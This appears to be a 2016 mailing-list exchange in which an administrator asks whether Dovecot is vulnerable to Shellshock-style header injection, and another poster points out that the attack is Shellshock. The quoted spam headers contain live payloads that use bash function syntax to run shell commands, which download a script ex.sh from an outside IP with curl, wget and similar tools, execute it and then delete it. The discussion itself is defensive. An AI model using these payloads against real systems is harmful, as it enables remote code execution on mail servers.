Re: is dovecot vulnerable to this kind of attack?

[Louis Kowolowski]

> 
> On Jan 27, 2016, at 1:43 PM, Alexander Dalloz <ad+li...@uni-x.org> wrote:
> 
> Am 27.01.2016 um 21:10 schrieb Louis Kowolowski:
>> I found an interesting email that got caught in my spam quarantine. I’m 
>> wondering if dovecot is vulnerable to this kind of code execution (I’m aware 
>> that other components could be vulnerable, but this question is specifically 
>> targeting dovecot).
>> 
>> The idea is to insert shell commands into various header fields that would 
>> get executed as part of the message processing/delivery.
>> 
>> Examples include:
>> 
>> From: () {:;};/bin/sh -c 'cd /tmp;curl -sO 62.75.175.145/ex.sh;lwp-download 
>> http: //62.75.175.145/ex...@nes.txt.com;,
>>      w...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;,
>>      fe...@nes.txt.com, 62.75.175.145/ex...@nes.txt.com;, s...@nes.txt.com,
>>      ex...@nes.txt.com;, r...@nes.txt.com, -f...@nes.txt.com,
>>      ex.*'@nes.txt.com, &@nes.txt.com;
>> 
>> Subject:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 
>> 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 
>> 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>> 
>> Date:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 
>> 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 
>> 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>> 
>> Message-ID:() { :; }; /bin/sh -c 'cd /tmp ;curl -sO 
>> 62.75.175.145/ex.sh;lwp-download http://62.75.175.145/ex.sh;wget 
>> 62.75.175.145/ex.sh;fetch 62.75.175.145/ex.sh;sh ex.sh;rm -fr ex.*' &;
>> 
>> The full message, should it be of interest, can be found here:
>> 
>> https://dl.dropboxusercontent.com/u/17066730/interesting%20email.txt
>> 
>> Thank you!
>> --
>> Louis Kowolowski                                lou...@cryptomonkeys.org
>> Cryptomonkeys:                                   
>> http://www.cryptomonkeys.com/
>> 
>> Making life more interesting for people since 1977
> 
> Where had you been in 2014 when shellshock had been the big buzz?
> 
The system in question doesn’t have bash, and I’d already verified none of the 
other components were vulnerable. When I ran across this, I realized I hadn’t 
checked to ensure dovecot properly escaped things.

--
Louis Kowolowski                                lou...@cryptomonkeys.org 
<mailto:lou...@cryptomonkeys.org>
Cryptomonkeys:                                   http://www.cryptomonkeys.com/ 
<http://www.cryptomonkeys.com/>

Making life more interesting for people since 1977

signature.asc
Description: Message signed with OpenPGP using GPGMail